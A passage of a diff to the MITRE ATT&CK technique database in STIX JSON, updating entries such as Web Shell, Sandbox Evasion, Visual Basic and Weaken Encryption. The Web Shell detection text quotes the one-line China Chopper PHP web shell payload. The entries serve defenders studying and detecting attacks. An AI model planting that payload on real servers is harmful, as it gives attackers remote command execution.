additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors. \n\nAdversaries may use several methods to accomplish [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) such as checking for security monitoring tools (e.g., Sysinternals, Wireshark, etc.) or other system artifacts associated with analysis or virtualization. Adversaries may also check for legitimate user activity to help determine if it is in an analysis environment. Additional methods include use of sleep timers or loops within malware code to avoid operating within a temporary sandbox.(Citation: Unit 42 Pirpi July 2015)\n\n", + "name": "Virtualization/Sandbox Evasion", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" ], - "x_mitre_platforms": [ - "Windows", - "macOS", - "Linux" - ], - "x_mitre_contributors": [ - "Deloitte Threat Library Team", - "Sunny Neo" + "external_references": [ + { + "source_name": "mitre-attack", + "external_id": "T1497", + "url": "https://attack.mitre.org/techniques/T1497" + }, + { + "source_name": "Unit 42 Pirpi July 2015", + "url": "https://unit42.paloaltonetworks.com/ups-observations-on-cve-2015-3113-prior-zero-days-and-the-pirpi-payload/", + "description": "Falcone, R., Wartell, R.. (2015, July 27). UPS: Observations on CVE-2015-3113, Prior Zero-Days and the Pirpi Payload. Retrieved April 23, 2019." + } ], + "x_mitre_is_subtechnique": false, "x_mitre_defense_bypassed": [ "Anti-virus", "Host forensic analysis", "Signature-based detection", "Static File Analysis" ], - "x_mitre_is_subtechnique": false + "x_mitre_contributors": [ + "Deloitte Threat Library Team", + "Sunny Neo" + ], + "x_mitre_platforms": [ + "Windows", + "macOS", + "Linux" + ], + "x_mitre_data_sources": [ + "Process monitoring", + "Process command-line parameters" + ], + "x_mitre_detection": "Virtualization, sandbox, user activity, and related discovery techniques will likely occur in the first steps of an operation but may also occur throughout as an adversary learns the environment. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as lateral movement, based on the information obtained. Detecting actions related to virtualization and sandbox identification may be difficult depending on the adversary's implementation and monitoring required. Monitoring for suspicious processes being spawned that gather a variety of system information or perform other forms of Discovery, especially in a short period of time, may aid in detection.", + "x_mitre_version": "1.2" }, { "id": "attack-pattern--dfd7cc1d-e1d8-4394-a198-97c4cab8aa67", - "description": "Adversaries may abuse Visual Basic (VB) for execution. VB is a programming language created by Microsoft with interoperability with many Windows technologies such as [Component Object Model](https://attack.mitre.org/techniques/T1559/001) and the [Native API](https://attack.mitre.org/techniques/T1106) through the Windows API. Although tagged as legacy with no planned future evolutions, VB is integrated and supported in the .NET Framework and cross-platform .NET Core.(Citation: VB .NET Mar 2020)(Citation: VB Microsoft)\n\nDerivative languages based on VB have also been created, such as Visual Basic for Applications (VBA) and VBScript. VBA is an event-driven programming language built into Office applications.(Citation: Microsoft VBA) VBA enables documents to contain macros used to automate the execution of tasks and other functionality on the host. VBScript is a default scripting language on Windows hosts and can also be used in place of [JavaScript/JScript](https://attack.mitre.org/techniques/T1059/007) on HTML Application (HTA) webpages served to Internet Explorer (though most modern browsers do not come with VBScript support).(Citation: Microsoft VBScript)\n\nAdversaries may use VB payloads to execute malicious commands. Common malicious usage includes automating execution of behaviors with VBScript or embedding VBA content into [Spearphishing Attachment](https://attack.mitre.org/techniques/T1566/001) payloads.", + "description": "Adversaries may abuse Visual Basic (VB) for execution. VB is a programming language created by Microsoft with interoperability with many Windows technologies such as [Component Object Model](https://attack.mitre.org/techniques/T1559/001) and the [Native API](https://attack.mitre.org/techniques/T1106) through the Windows API. Although tagged as legacy with no planned future evolutions, VB is integrated and supported in the .NET Framework and cross-platform .NET Core.(Citation: VB .NET Mar 2020)(Citation: VB Microsoft)\n\nDerivative languages based on VB have also been created, such as Visual Basic for Applications (VBA) and VBScript. VBA is an event-driven programming language built into Microsoft Office, as well as several third-party applications.(Citation: Microsoft VBA)(Citation: Wikipedia VBA) VBA enables documents to contain macros used to automate the execution of tasks and other functionality on the host. VBScript is a default scripting language on Windows hosts and can also be used in place of [JavaScript/JScript](https://attack.mitre.org/techniques/T1059/007) on HTML Application (HTA) webpages served to Internet Explorer (though most modern browsers do not come with VBScript support).(Citation: Microsoft VBScript)\n\nAdversaries may use VB payloads to execute malicious commands. Common malicious usage includes automating execution of behaviors with VBScript or embedding VBA content into [Spearphishing Attachment](https://attack.mitre.org/techniques/T1566/001) payloads.", "name": "Visual Basic", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "object_marking_refs": [ @@ -29486,6 +34155,11 @@ "url": "https://docs.microsoft.com/office/vba/api/overview/", "description": "Microsoft. (2019, June 11). Office VBA Reference. Retrieved June 23, 2020." }, + { + "source_name": "Wikipedia VBA", + "url": "https://en.wikipedia.org/wiki/Visual_Basic_for_Applications", + "description": "Wikipedia. (n.d.). Visual Basic for Applications. Retrieved August 13, 2020." + }, { "source_name": "Microsoft VBScript", "url": "https://docs.microsoft.com/previous-versions//1kw29xwf(v=vs.85)", @@ -29499,7 +34173,7 @@ "phase_name": "execution" } ], - "modified": "2020-06-25T03:32:51.046Z", + "modified": "2020-08-13T20:09:39.122Z", "created": "2020-03-09T14:29:51.508Z", "x_mitre_platforms": [ "Windows", @@ -29520,29 +34194,171 @@ "SYSTEM" ], "x_mitre_is_subtechnique": true, - "x_mitre_version": "1.0" + "x_mitre_version": "1.1" }, { - "created": "2020-02-11T18:59:50.058Z", - "modified": "2020-03-24T21:16:16.580Z", + "external_references": [ + { + "source_name": "mitre-attack", + "external_id": "T1588.006", + "url": "https://attack.mitre.org/techniques/T1588/006" + }, + { + "source_name": "National Vulnerability Database", + "url": "https://nvd.nist.gov/", + "description": "National Vulnerability Database. (n.d.). National Vulnerability Database. Retrieved October 15, 2020." + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Vulnerabilities", + "description": "Before compromising a victim, adversaries may acquire information about vulnerabilities that can be used during targeting. A vulnerability is a weakness in computer hardware or software that can, potentially, be exploited by an adversary to cause unintended or unanticipated behavior to occur. Adversaries may find vulnerability information by searching open databases or gaining access to closed vulnerability databases.(Citation: National Vulnerability Database)\n\nAn adversary may monitor vulnerability disclosures/databases to understand the state of existing, as well as newly discovered, vulnerabilities. There is usually a delay between when a vulnerability is discovered and when it is made public. An adversary may target the systems of those known to conduct vulnerability research (including commercial vendors). Knowledge of a vulnerability may cause an adversary to search for an existing exploit (i.e. [Exploits](https://attack.mitre.org/techniques/T1588/005)) or to attempt to develop one themselves (i.e. [Exploits](https://attack.mitre.org/techniques/T1587/004)).", + "id": "attack-pattern--2b5aa86b-a0df-4382-848d-30abea443327", + "type": "attack-pattern", "kill_chain_phases": [ { "kill_chain_name": "mitre-attack", - "phase_name": "collection" - }, - { - "kill_chain_name": "mitre-attack", - "phase_name": "credential-access" + "phase_name": "resource-development" } ], + "modified": "2020-10-16T01:54:39.868Z", + "created": "2020-10-15T02:59:38.628Z", + "x_mitre_detection": "Much of this activity will take place outside the visibility of the target organization, making detection of this behavior difficult. Detection efforts may be focused on behaviors relating to the potential use of exploits for vulnerabilities (i.e. [Exploit Public-Facing Application](https://attack.mitre.org/techniques/T1190), [Exploitation for Client Execution](https://attack.mitre.org/techniques/T1203), [Exploitation for Privilege Escalation](https://attack.mitre.org/techniques/T1068), [Exploitation for Defense Evasion](https://attack.mitre.org/techniques/T1211), [Exploitation for Credential Access](https://attack.mitre.org/techniques/T1212), [Exploitation of Remote Services](https://attack.mitre.org/techniques/T1210), and [Application or System Exploitation](https://attack.mitre.org/techniques/T1499/004)).", + "x_mitre_version": "1.0", + "x_mitre_is_subtechnique": true, + "x_mitre_platforms": [ + "PRE" + ] + }, + { + "external_references": [ + { + "source_name": "mitre-attack", + "external_id": "T1595.002", + "url": "https://attack.mitre.org/techniques/T1595/002" + }, + { + "source_name": "OWASP Vuln Scanning", + "url": "https://wiki.owasp.org/index.php/OAT-014_Vulnerability_Scanning", + "description": "OWASP Wiki. (2018, February 16). OAT-014 Vulnerability Scanning. Retrieved October 20, 2020." + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Vulnerability Scanning", + "description": "Before compromising a victim, adversaries may scan victims for vulnerabilities that can be used during targeting. Vulnerability scans typically check if the configuration of a target host/application (ex: software and version) potentially aligns with the target of a specific exploit the adversary may seek to use.\n\nThese scans may also include more broad attempts to [Gather Victim Host Information](https://attack.mitre.org/techniques/T1592) that can be used to identify more commonly known, exploitable vulnerabilities. Vulnerability scans typically harvest running software and version numbers via server banners, listening ports, or other network artifacts.(Citation: OWASP Vuln Scanning) Information from these scans may reveal opportunities for other forms of reconnaissance (ex: [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593) or [Search Open Technical Databases](https://attack.mitre.org/techniques/T1596)), establishing operational resources (ex: [Develop Capabilities](https://attack.mitre.org/techniques/T1587) or [Obtain Capabilities](https://attack.mitre.org/techniques/T1588)), and/or initial access (ex: [Exploit Public-Facing Application](https://attack.mitre.org/techniques/T1190)).", + "id": "attack-pattern--5502c4e9-24ef-4d5f-8ee9-9e906c2f82c4", "type": "attack-pattern", - "id": "attack-pattern--69e5226d-05dc-4f15-95d7-44f5ed78d06e", - "description": "Adversaries may install code on externally facing portals, such as a VPN login page, to capture and transmit credentials of users who attempt to log into the service. For example, a compromised login page may log provided user credentials before logging the user in to the service.\n\nThis variation on input capture may be conducted post-compromise using legitimate administrative access as a backup measure to maintain network access through [External Remote Services](https://attack.mitre.org/techniques/T1133) and [Valid Accounts](https://attack.mitre.org/techniques/T1078) or as part of the initial compromise by exploitation of the externally facing web service.(Citation: Volexity Virtual Private Keylogging)", - "name": "Web Portal Capture", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "reconnaissance" + } + ], + "modified": "2020-10-24T03:58:06.761Z", + "created": "2020-10-02T16:55:16.047Z", + "x_mitre_data_sources": [ + "Packet capture", + "Network device logs" + ], + "x_mitre_detection": "Monitor for suspicious network traffic that could be indicative of scanning, such as large quantities originating from a single source (especially if the source is known to be associated with an adversary/botnet). Analyzing web metadata may also reveal artifacts that can be attributed to potentially malicious activity, such as referer or user-agent string HTTP/S fields.\n\nMuch of this activity may have a very high occurrence and associated false positive rate, as well as potentially taking place outside the visibility of the target organization, making detection difficult for defenders.\n\nDetection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access.", + "x_mitre_version": "1.0", + "x_mitre_is_subtechnique": true, + "x_mitre_platforms": [ + "PRE" + ] + }, + { + "external_references": [ + { + "source_name": "mitre-attack", + "external_id": "T1596.002", + "url": "https://attack.mitre.org/techniques/T1596/002" + }, + { + "source_name": "WHOIS", + "url": "https://www.whois.net/", + "description": "NTT America. (n.d.). Whois Lookup. Retrieved October 20, 2020." + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "WHOIS", + "description": "Before compromising a victim, adversaries may search public WHOIS data for information about victims that can be used during targeting. WHOIS data is stored by regional Internet registries (RIR) responsible for allocating and assigning Internet resources such as domain names. Anyone can query WHOIS servers for information about a registered domain, such as assigned IP blocks, contact information, and DNS nameservers.(Citation: WHOIS)\n\nAdversaries may search WHOIS data to gather actionable information. Threat actors can use online resources or command-line utilities to pillage through WHOIS data for information about potential victims. Information from these sources may reveal opportunities for other forms of reconnaissance (ex: [Active Scanning](https://attack.mitre.org/techniques/T1595) or [Phishing for Information](https://attack.mitre.org/techniques/T1598)), establishing operational resources (ex: [Acquire Infrastructure](https://attack.mitre.org/techniques/T1583) or [Compromise Infrastructure](https://attack.mitre.org/techniques/T1584)), and/or initial access (ex: [External Remote Services](https://attack.mitre.org/techniques/T1133) or [Trusted Relationship](https://attack.mitre.org/techniques/T1199)).", + "id": "attack-pattern--166de1c6-2814-4fe5-8438-4e80f76b169f", + "type": "attack-pattern", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "reconnaissance" + } + ], + "modified": "2020-10-24T04:20:43.941Z", + "created": "2020-10-02T16:56:49.744Z", + "x_mitre_detection": "Much of this activity may have a very high occurrence and associated false positive rate, as well as potentially taking place outside the visibility of the target organization, making detection difficult for defenders.\n\nDetection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access.", + "x_mitre_version": "1.0", + "x_mitre_is_subtechnique": true, + "x_mitre_platforms": [ + "PRE" + ] + }, + { + "id": "attack-pattern--1f9012ef-1e10-4e48-915e-e03563435fe8", + "description": "Adversaries may compromise a network device\u2019s encryption capability in order to bypass encryption that would otherwise protect data communications. (Citation: Cisco Synful Knock Evolution)\n\nEncryption can be used to protect transmitted network traffic to maintain its confidentiality (protect against unauthorized disclosure) and integrity (protect against unauthorized changes). Encryption ciphers are used to convert a plaintext message to ciphertext and can be computationally intensive to decipher without the associated decryption key. Typically, longer keys increase the cost of cryptanalysis, or decryption without the key.\n\nAdversaries can compromise and manipulate devices that perform encryption of network traffic. For example, through behaviors such as [Modify System Image](https://attack.mitre.org/techniques/T1601), [Reduce Key Space](https://attack.mitre.org/techniques/T1600/001), and [Disable Crypto Hardware](https://attack.mitre.org/techniques/T1600/002), an adversary can negatively effect and/or eliminate a device\u2019s ability to securely encrypt network traffic. This poses a greater risk of unauthorized disclosure and may help facilitate data manipulation, Credential Access, or Collection efforts. (Citation: Cisco Blog Legacy Device Attacks)", + "name": "Weaken Encryption", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "object_marking_refs": [ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" ], + "external_references": [ + { + "source_name": "mitre-attack", + "external_id": "T1600", + "url": "https://attack.mitre.org/techniques/T1600" + }, + { + "source_name": "Cisco Synful Knock Evolution", + "url": "https://blogs.cisco.com/security/evolution-of-attacks-on-cisco-ios-devices", + "description": "Graham Holmes. (2015, October 8). Evolution of attacks on Cisco IOS devices. Retrieved October 19, 2020." + }, + { + "source_name": "Cisco Blog Legacy Device Attacks", + "url": "https://community.cisco.com/t5/security-blogs/attackers-continue-to-target-legacy-devices/ba-p/4169954", + "description": "Omar Santos. (2020, October 19). Attackers Continue to Target Legacy Devices. Retrieved October 20, 2020." + } + ], + "type": "attack-pattern", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "defense-evasion" + } + ], + "modified": "2020-10-21T22:37:49.258Z", + "created": "2020-10-19T18:47:08.759Z", + "x_mitre_data_sources": [ + "File monitoring" + ], + "x_mitre_platforms": [ + "Network" + ], + "x_mitre_detection": "There is no documented method for defenders to directly identify behaviors that weaken encryption. Detection efforts may be focused on closely related adversary behaviors, such as [Modify System Image](https://attack.mitre.org/techniques/T1601). Some detection methods require vendor support to aid in investigation.", + "x_mitre_defense_bypassed": [ + "Encryption" + ], + "x_mitre_permissions_required": [ + "Administrator" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_version": "1.0" + }, + { "external_references": [ { "source_name": "mitre-attack", @@ -29560,19 +34376,39 @@ "source_name": "Volexity Virtual Private Keylogging" } ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Web Portal Capture", + "description": "Adversaries may install code on externally facing portals, such as a VPN login page, to capture and transmit credentials of users who attempt to log into the service. For example, a compromised login page may log provided user credentials before logging the user in to the service.\n\nThis variation on input capture may be conducted post-compromise using legitimate administrative access as a backup measure to maintain network access through [External Remote Services](https://attack.mitre.org/techniques/T1133) and [Valid Accounts](https://attack.mitre.org/techniques/T1078) or as part of the initial compromise by exploitation of the externally facing web service.(Citation: Volexity Virtual Private Keylogging)", + "id": "attack-pattern--69e5226d-05dc-4f15-95d7-44f5ed78d06e", + "type": "attack-pattern", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "collection" + }, + { + "kill_chain_name": "mitre-attack", + "phase_name": "credential-access" + } + ], + "modified": "2020-03-24T21:16:16.580Z", + "created": "2020-02-11T18:59:50.058Z", + "x_mitre_system_requirements": [ + "An externally facing login portal is configured." + ], + "x_mitre_data_sources": [ + "File monitoring" + ], + "x_mitre_detection": "File monitoring may be used to detect changes to files in the Web directory for organization login pages that do not match with authorized updates to the Web server's content.", + "x_mitre_version": "1.0", + "x_mitre_is_subtechnique": true, "x_mitre_platforms": [ "Linux", "macOS", "Windows" - ], - "x_mitre_is_subtechnique": true, - "x_mitre_version": "1.0", - "x_mitre_detection": "File monitoring may be used to detect changes to files in the Web directory for organization login pages that do not match with authorized updates to the Web server's content.", - "x_mitre_data_sources": [ - "File monitoring" - ], - "x_mitre_system_requirements": [ - "An externally facing login portal is configured." ] }, { @@ -29671,6 +34507,73 @@ "x_mitre_version": "1.1", "x_mitre_is_subtechnique": false }, + { + "external_references": [ + { + "source_name": "mitre-attack", + "external_id": "T1583.006", + "url": "https://attack.mitre.org/techniques/T1583/006" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Web Services", + "description": "Before compromising a victim, adversaries may register for web services\u00a0that can be used during targeting. A variety of popular websites exist for adversaries to register for a web-based service that can be abused during later stages of the adversary lifecycle, such as during Command and Control ([Web Service](https://attack.mitre.org/techniques/T1102)) or [Exfiltration Over Web Service](https://attack.mitre.org/techniques/T1567). Using common services, such as those offered by Google or Twitter, makes it easier for adversaries to hide in expected noise. By utilizing a web service, adversaries can make it difficult to physically tie back operations to them.", + "id": "attack-pattern--88d31120-5bc7-4ce3-a9c0-7cf147be8e54", + "type": "attack-pattern", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "resource-development" + } + ], + "modified": "2020-10-22T17:59:17.456Z", + "created": "2020-10-01T00:50:29.936Z", + "x_mitre_detection": "Much of this activity will take place outside the visibility of the target organization, making detection of this behavior difficult. Detection efforts may be focused on related stages of the adversary lifecycle, such as during Command and Control ([Web Service](https://attack.mitre.org/techniques/T1102)) or [Exfiltration Over Web Service](https://attack.mitre.org/techniques/T1567).", + "x_mitre_version": "1.0", + "x_mitre_is_subtechnique": true, + "x_mitre_platforms": [ + "PRE" + ] + }, + { + "external_references": [ + { + "source_name": "mitre-attack", + "external_id": "T1584.006", + "url": "https://attack.mitre.org/techniques/T1584/006" + }, + { + "source_name": "Recorded Future Turla Infra 2020", + "url": "https://www.recordedfuture.com/turla-apt-infrastructure/", + "description": "Insikt Group. (2020, March 12). Swallowing the Snake\u2019s Tail: Tracking Turla Infrastructure. Retrieved October 20, 2020." + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Web Services", + "description": "Before compromising a victim, adversaries may compromise access to third-party web services\u00a0that can be used during targeting. A variety of popular websites exist for legitimate users to register for web-based services, such as GitHub, Twitter, Dropbox, Google, etc. Adversaries may try to take ownership of a legitimate user's access to a web service and use that web service as infrastructure in support of cyber operations. Such web services can be abused during later stages of the adversary lifecycle, such as during Command and Control ([Web Service](https://attack.mitre.org/techniques/T1102)) or [Exfiltration Over Web Service](https://attack.mitre.org/techniques/T1567).(Citation: Recorded Future Turla Infra 2020) Using common services, such as those offered by Google or Twitter, makes it easier for adversaries to hide in expected noise. By utilizing a web service, particularly when access is stolen from legitimate users, adversaries can make it difficult to physically tie back operations to them.", + "id": "attack-pattern--ae797531-3219-49a4-bccf-324ad7a4c7b2", + "type": "attack-pattern", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "resource-development" + } + ], + "modified": "2020-10-22T18:02:30.304Z", + "created": "2020-10-01T01:01:00.176Z", + "x_mitre_detection": "Much of this activity will take place outside the visibility of the target organization, making detection of this behavior difficult. Detection efforts may be focused on related stages of the adversary lifecycle, such as during Command and Control ([Web Service](https://attack.mitre.org/techniques/T1102)) or [Exfiltration Over Web Service](https://attack.mitre.org/techniques/T1567).", + "x_mitre_version": "1.0", + "x_mitre_is_subtechnique": true, + "x_mitre_platforms": [ + "PRE" + ] + }, { "external_references": [ { @@ -29703,6 +34606,11 @@ "external_id": "T1550.004", "url": "https://attack.mitre.org/techniques/T1550/004" }, + { + "external_id": "CAPEC-60", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/60.html" + }, { "description": "Rehberger, J. (2018, December). Pivot to the Cloud using Pass the Cookie. Retrieved April 5, 2019.", "url": "https://wunderwuzzi23.github.io/blog/passthecookie.html", @@ -29732,9 +34640,9 @@ "phase_name": "lateral-movement" } ], - "modified": "2020-03-24T12:36:24.501Z", + "modified": "2020-09-16T19:40:44.527Z", "created": "2020-01-30T17:48:49.395Z", - "x_mitre_version": "1.0", + "x_mitre_version": "1.1", "x_mitre_is_subtechnique": true, "x_mitre_defense_bypassed": [ "System Access Controls" @@ -29783,6 +34691,22 @@ "created": "2017-05-31T21:31:13.061Z" }, { + "created": "2019-12-13T16:46:18.927Z", + "modified": "2020-09-16T19:34:19.752Z", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "persistence" + } + ], + "type": "attack-pattern", + "id": "attack-pattern--5d0d3609-d06d-49e1-b9c9-b544e0c618cb", + "description": "Adversaries may backdoor web servers with web shells to establish persistent access to systems. A Web shell is a Web script that is placed on an openly accessible Web server to allow an adversary to use the Web server as a gateway into a network. A Web shell may provide a set of functions to execute or a command-line interface on the system that hosts the Web server.\n\nIn addition to a server-side script, a Web shell may have a client interface program that is used to talk to the Web server (ex: [China Chopper](https://attack.mitre.org/software/S0020) Web shell client).(Citation: Lee 2013) ", + "name": "Web Shell", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], "external_references": [ { "source_name": "mitre-attack", @@ -29790,9 +34714,14 @@ "url": "https://attack.mitre.org/techniques/T1505/003" }, { - "url": "https://www.fireeye.com/blog/threat-research/2013/08/breaking-down-the-china-chopper-web-shell-part-i.html", + "external_id": "CAPEC-650", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/650.html" + }, + { + "source_name": "Lee 2013", "description": "Lee, T., Hanzlik, D., Ahl, I. (2013, August 7). Breaking Down the China Chopper Web Shell - Part I. Retrieved March 27, 2015.", - "source_name": "Lee 2013" + "url": "https://www.fireeye.com/blog/threat-research/2013/08/breaking-down-the-china-chopper-web-shell-part-i.html" }, { "url": "https://www.us-cert.gov/ncas/alerts/TA15-314A", @@ -29800,43 +34729,27 @@ "source_name": "US-CERT Alert TA15-314A Web Shells" } ], - "object_marking_refs": [ - "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + "x_mitre_platforms": [ + "Linux", + "Windows", + "macOS" ], - "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", - "name": "Web Shell", - "description": "Adversaries may backdoor web servers with web shells to establish persistent access to systems. A Web shell is a Web script that is placed on an openly accessible Web server to allow an adversary to use the Web server as a gateway into a network. A Web shell may provide a set of functions to execute or a command-line interface on the system that hosts the Web server.\n\nIn addition to a server-side script, a Web shell may have a client interface program that is used to talk to the Web server (ex: [China Chopper](https://attack.mitre.org/software/S0020) Web shell client).(Citation: Lee 2013) ", - "id": "attack-pattern--5d0d3609-d06d-49e1-b9c9-b544e0c618cb", - "type": "attack-pattern", - "kill_chain_phases": [ - { - "kill_chain_name": "mitre-attack", - "phase_name": "persistence" - } - ], - "modified": "2020-04-17T17:47:56.673Z", - "created": "2019-12-13T16:46:18.927Z", - "x_mitre_version": "1.0", - "x_mitre_is_subtechnique": true, - "x_mitre_system_requirements": [ - "Adversary access to Web server with vulnerability or account to upload and serve the Web shell file." - ], - "x_mitre_permissions_required": [ - "SYSTEM", - "User" - ], - "x_mitre_detection": "Web shells can be difficult to detect. Unlike other forms of persistent remote access, they do not initiate connections. The portion of the Web shell that is on the server may be small and innocuous looking. The PHP version of the China Chopper Web shell, for example, is the following short payload: (Citation: Lee 2013) \n\n<?php @eval($_POST['password']);>\n\nNevertheless, detection mechanisms exist. Process monitoring may be used to detect Web servers that perform suspicious actions such as running cmd.exe or accessing files that are not in the Web directory. File monitoring may be used to detect changes to files in the Web directory of a Web server that do not match with updates to the Web server's content and may indicate implantation of a Web shell script. Log authentication attempts to the server and any unusual traffic patterns to or from the server and internal network. (Citation: US-CERT Alert TA15-314A Web Shells) ", "x_mitre_data_sources": [ "Process monitoring", "Netflow/Enclave netflow", "File monitoring", "Authentication logs" ], - "x_mitre_platforms": [ - "Linux", - "Windows", - "macOS" - ] + "x_mitre_detection": "Web shells can be difficult to detect. Unlike other forms of persistent remote access, they do not initiate connections. The portion of the Web shell that is on the server may be small and innocuous looking. The PHP version of the China Chopper Web shell, for example, is the following short payload: (Citation: Lee 2013) \n\n<?php @eval($_POST['password']);>\n\nNevertheless, detection mechanisms exist. Process monitoring may be used to detect Web servers that perform suspicious actions such as running cmd.exe or accessing files that are not in the Web directory. File monitoring may be used to detect changes to files in the Web directory of a Web server that do not match with updates to the Web server's content and may indicate implantation of a Web shell script. Log authentication attempts to the server and any unusual traffic patterns to or from the server and internal network. (Citation: US-CERT Alert TA15-314A Web Shells) ", + "x_mitre_permissions_required": [ + "SYSTEM", + "User" + ], + "x_mitre_system_requirements": [ + "Adversary access to Web server with vulnerability or account to upload and serve the Web shell file." + ], + "x_mitre_is_subtechnique": true, + "x_mitre_version": "1.1" }, { "external_references": [ @@ -29970,7 +34883,7 @@ ], "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "name": "Windows File and Directory Permissions Modification", - "description": "Adversaries may modify file or directory permissions/attributes to evade access control lists (ACLs) and access protected files.(Citation: Hybrid Analysis Icacls1 June 2018)(Citation: Hybrid Analysis Icacls2 May 2018) File and directory permissions are commonly managed by ACLs configured by the file or directory owner, or users with the appropriate permissions. File and directory ACL implementations vary by platform, but generally explicitly designate which users or groups can perform which actions (read, write, execute, etc.).\n\nWindows implements file and directory ACLs as Discretionary Access Control Lists (DACLs).(Citation: Microsoft DACL May 2018) Similar to a standard ACL, DACLs identifies the accounts that are allowed or denied access to a securable object. When an attempt is made to access a securable object, the system checks the access control entries in the DACL in order. If a matching entry is found, access to the object is granted. Otherwise, access is denied.(Citation: Microsoft Access Control Lists May 2018)\n\nAdversaries can interact with the DACLs using built-in Windows commands, such as `icacls`, `takeown`, and `attrib`, which can grant adversaries higher permissions on specific files and folders. Further, [PowerShell](https://attack.mitre.org/techniques/T1059/001) provides cmdlets that can be used to retrieve or modify file and directory DACLs. Specific file and directory modifications may be a required step for many techniques, such as establishing Persistence via [Accessibility Features](https://attack.mitre.org/techniques/T1546/008), [Boot or Logon Initialization Scripts](https://attack.mitre.org/techniques/T1037), or tainting/hijacking other instrumental binary/configuration files via [Hijack Execution Flow](https://attack.mitre.org/techniques/T1574).", + "description": "Adversaries may modify file or directory permissions/attributes to evade access control lists (ACLs) and access protected files.(Citation: Hybrid Analysis Icacls1 June 2018)(Citation: Hybrid Analysis Icacls2 May 2018) File and directory permissions are commonly managed by ACLs configured by the file or directory owner, or users with the appropriate permissions. File and directory ACL implementations vary by platform, but generally explicitly designate which users or groups can perform which actions (read, write, execute, etc.).\n\nWindows implements file and directory ACLs as Discretionary Access Control Lists (DACLs).(Citation: Microsoft DACL May 2018) Similar to a standard ACL, DACLs identifies the accounts that are allowed or denied access to a securable object. When an attempt is made to access a securable object, the system checks the access control entries in the DACL in order. If a matching entry is found, access to the object is granted. Otherwise, access is denied.(Citation: Microsoft Access Control Lists May 2018)\n\nAdversaries can interact with the DACLs using built-in Windows commands, such as `icacls`, `cacls`, `takeown`, and `attrib`, which can grant adversaries higher permissions on specific files and folders. Further, [PowerShell](https://attack.mitre.org/techniques/T1059/001) provides cmdlets that can be used to retrieve or modify file and directory DACLs. Specific file and directory modifications may be a required step for many techniques, such as establishing Persistence via [Accessibility Features](https://attack.mitre.org/techniques/T1546/008), [Boot or Logon Initialization Scripts](https://attack.mitre.org/techniques/T1037), or tainting/hijacking other instrumental binary/configuration files via [Hijack Execution Flow](https://attack.mitre.org/techniques/T1574).", "id": "attack-pattern--34e793de-0274-4982-9c1a-246ed1c19dee", "type": "attack-pattern", "kill_chain_phases": [ @@ -29979,9 +34892,9 @@ "phase_name": "defense-evasion" } ], - "modified": "2020-03-29T23:07:55.953Z", + "modified": "2020-09-01T20:05:05.268Z", "created": "2020-02-04T19:17:41.767Z", - "x_mitre_version": "1.0", + "x_mitre_version": "1.1", "x_mitre_is_subtechnique": true, "x_mitre_permissions_required": [ "User", @@ -30299,6 +35212,21 @@ "external_id": "T1543.003", "url": "https://attack.mitre.org/techniques/T1543/003" }, + { + "external_id": "CAPEC-478", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/478.html" + }, + { + "external_id": "CAPEC-550", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/550.html" + }, + { + "external_id": "CAPEC-551", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/551.html" + }, { "url": "https://technet.microsoft.com/en-us/library/cc772408.aspx", "description": "Microsoft. (n.d.). Services. Retrieved June 7, 2016.", @@ -30331,13 +35259,13 @@ "phase_name": "privilege-escalation" } ], - "modified": 